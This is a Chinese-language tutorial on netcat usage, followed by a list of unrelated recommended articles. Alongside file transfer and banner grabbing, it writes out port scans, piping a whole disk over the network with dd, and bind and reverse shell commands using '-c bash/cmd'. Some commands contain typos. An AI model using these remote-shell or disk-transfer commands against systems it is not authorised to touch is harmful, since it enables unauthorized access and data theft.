1. NC

1.1概述

1.1.1 优点:

1)网络工具中的瑞士军刀

2)侦听模式/传输模式。

3)可代替telnet获取banner信息。

4)传输文件/目录。

5)传输文本信息。

6)加密传输文件。

7)远控/木马。

8)加密所有流量。

9)充当流媒体服务器。

10)远程克隆硬盘(电子取证)。

1.1.2 缺点:

1)缺乏加密和身份验证能力。

2)NCAT可弥补NC的不足。

3)不同平台/系统的NC参数不尽相同。

1.2 基本参数

-h :获取帮助。

-v :显示详细信息。

-n :不进行DNS解析IP。

-l :侦听端口。

-p :指定端口。

-q :执行完成关闭连接。

-z :只扫描,不进行交互。

-c :指定shell。

1.3 用法

1.3.1 Telnet获取banner信息

命令:nc -nv <IP> <端口>

1.3.2 传输文本

服务端命令:nc -lp <IP> <端口>

客户端命令:nc -nv <IP> <端口>

1.3.3 电子取证(不做修改的信息收集)

客户端命令:收集指令 | nc -nv <IP> <端口>  注:-q表示完成后n秒断开连接

服务端命令:nc -lp <IP> <端口>  注:当收集大量信息时可用>或>>保存至文件。

1.3.4    文件传输

正向:客户端向服务端传输文件。

服务端命令: nc -lp <端口> > 文件

客户端命令: nc -nv <IP> <端口> < 文件

反向:客户端从服务端接收文件。

服务端命令: nc -lp <端口> < 文件

客户端命令: nc -nv <IP> > 文件

1.3.5    目录传输

反向:客户端从服务端接收目录。

服务端命令: tar -cvf – 目录 | nc -lp <端口>

客户端命令: nc -nv <IP> 端口 | tar -xvf -

正向:客户端向服务端传输目录。

服务端命令: nc -lp <端口> | tar -xvf -

客户端命令:tar -cvf – 目录 | nc -nv <IP> 端口

1.3.6    加密传输

正向:客户端向服务端加密传输文件。

服务端命令:nc -lp 端口 | mycrypt –flush -Fbqd -a rijndael-256 -m ecb > 文件

客户端命令:mycrypt –flush -Fbq -a rijndael-256 -m ecb < 文件 | nc -nv <IP> 端口

反向:客户端从服务端加密接收目录。

服务端命令: mcrypt –flush -Fbq -a -rijndael-256 -m ecb < 文件| nc -lp <端口>

客户端命令:nc -nv <IP> 端口 | mcrypt –flush -Fqbd -a rijndael-256 -m ecb >文件

1.3.7    视频流传输

服务端命令:cat 流媒体文件| nc -lp 端口

客户端命令:nc -nv <IP> 端口 | mplayer -V0 -x11 -cache 3000 -

1.3.8    端口扫描

探测TCP端口(默认):nc -nvz 端口段

探测UDP端口(有bug):nc -nvzu 端口段

1.3.9    硬盘克隆

块级别备份,电子取证远程复制内存或硬盘。

客户端命令:dd if =/dev/sda | nc -nv <IP> 端口

服务端命令:nc -lp 端口 | dd of=/dev/sdb

1.3.10       远程控制

正向:客户端控制服务端。

服务端命令: nc -lp 端口 -c bash/cmd

客户端命令:nc -nv <IP> 端口

反向:服务端控制客户端。

服务端命令: nc -lp 端口

客户端命令:nc -nv <IP> 端口 -c bash/cmd

1.3.11       通过NCAT实现传输加密

Ncat为Nmap套件之一,为nc的增强版。

简单举例,也可以双向。

客户端命令:ncat -nv 192.168.114.132 1111 --ssl

服务端命令:ncat -c bsh –allow <源IP> -vnl 端口 –ssl

NC使用技巧的更多相关文章

  1. NC 工具的使用教程

    NC工具的使用说明...nc使用说明 参数介绍: nc.exe -h即可看到各参数的使用方法. 基本格式:nc [-options] hostname port[s] [ports] ... nc - ...

  2. netcat 工具传输文件

    因为电脑本地是 windows,多台机器间以 windows 为中介传输文件极度不爽.window 下的 MobaXterm 工具不能使用 sz 和 rz 命令, 而 SecureCRT 工具使用体验 ...

  3. Apache 中 .htaccess 文件设置技巧16则

    .htaccess 文件 (Hypertext Access file) 是Apache Web服务器的一个非常强大的配置文件,对于这个文件,Apache有一堆参数可以让你配置出几乎随心所欲的功能.. ...

  4. Linux shell用法和技巧(转)

    原文出处: techbar   译文出处: 外刊IT评论 使用Linux shell是我每天的基本工作,但我经常会忘记一些有用的shell命令和技巧.当然,命令我能记住,但我不敢说能记得如何用它执行某 ...

  5. 每个极客都应该知道的Linux技巧

    每个极客都应该知道的Linux技巧 2014/03/07 | 分类: IT技术 | 0 条评论 | 标签: LINUX 分享到:18 本文由 伯乐在线 - 欣仔 翻译自 TuxRadar Linux. ...

  6. 18个有用的 .htaccess 文件使用技巧

    .htaccess 是 Web 服务器 Apache 中特有的一个配置文件,操控着服务器上的许多行为,我们可以利用它来做许多事情,例如:设置访问权限,网址重定向,等等.本文向大家展示18条 .htac ...

  7. Linux中shell命令的用法和技巧

    使用Linux shell是我每天的基本工作,但我经常会忘记一些有用的shell命令和l技巧.当然,命令我能记住,但我不敢说能记得如何用它执行某个特定任务.于是,我开始在一个文本文件里记录这些用法,并 ...

  8. 最佳vim技巧

    最佳vim技巧----------------------------------------# 信息来源----------------------------------------www.vim ...

  9. 【Linux学习笔记】用nc实现两台主机间的文件传输(不需要输密码)

    通常,可以用scp完成两台主机间的文件传输任务,但在主机间未建立信任关系的情况下,scp每次都需要输入密码,用起来感觉不是很方便,之前这篇笔记介绍过不用输入密码执行脚本或传输文件的方法,但对于一些临时 ...

随机推荐

  1. Android应用开发基础之八:广播与服务(二)

    服务两种启动方式 startService:服务被启动之后,跟启动它的组件没有一毛钱关系 bindService:跟启动它的组件同生共死 绑定服务和解绑服务的生命周期方法:onCreate->o ...

  2. 织梦Dedecms主要文件夹目录及模板文件说明

    虽然织梦DedeCMS因为安全问题被人所诟病,但瑕不掩瑜,无论从用户群数量还是时间等各方面,织梦DedeCMS都是国内排名前几的CMS建站程序.如果你想学习CMS的二次开发,织梦DedeCMS是必须需 ...

  3. selenium:IE浏览器获取cookie提示Could not retrieve cookies

    from selenium import webdriver url = "https://www.baidu.com" dr = webdriver.Ie() dr.get(ur ...

  4. Android面试问题收集总结

    转载请标明出处: http://www.cnblogs.com/why168888/p/6405204.html 本文出自:[Edwin博客园] Android基础 View的绘制流程:自定义View ...

  5. 简单的PHP算法题

    简单的PHP算法题 目录 1.只根据n值打印n个0 2.根据n值打印一行 0101010101010101010101…… 3.根据n值实现1 00 111 0000 11111…… 4.根据n值实现 ...

  6. C++11新特性之 std::forward(完美转发)

    我们也要时刻清醒,有时候右值会转为左值,左值会转为右值. (也许“转换”二字用的不是很准确) 如果我们要避免这种转换呢? 我们需要一种方法能按照参数原来的类型转发到另一个函数中,这才完美,我们称之为完 ...

  7. Android(java)学习笔记48:通过反射获得带参构造方法并且使用

    1. 反射获得带参构造方法并且使用: (1)获取字节码文件对象       Class c = Class.forName("cn.itcast_01.Person"); (2)获 ...

  8. ZJOI2019Day2余姚中学游记(4.23~4.26)

    前言 \(Day2\),又是一场噩梦. 前段时间去做了挺多十二省联考和\(HNOI2019\)的题目,还订正掉了\(Day1\)的\(T1\)和\(T2\)(\(T3\)动态\(DP\)完全不想订正啊 ...

  9. LA 4254 贪心

    题意:有 n 个工作,他的允许的工作时间是 [l,r] ,工作量是 v ,求CPU最速度的最小值. 分析: 可能太久没有做题了,竟然脑子反应好慢的.还是很容易想到二分,但是二分怎么转移呢? 可以看出, ...

  10. POJ 3734 生成函数

    题意:一排n长度的砖,有四种颜色,红色绿色是偶数,有少染色方式. 分析: 泰勒展开式: chx = (e^x+e^(-x))/2 = 1 + x^2/2! + x^4/4! + x^6/6! + .. ...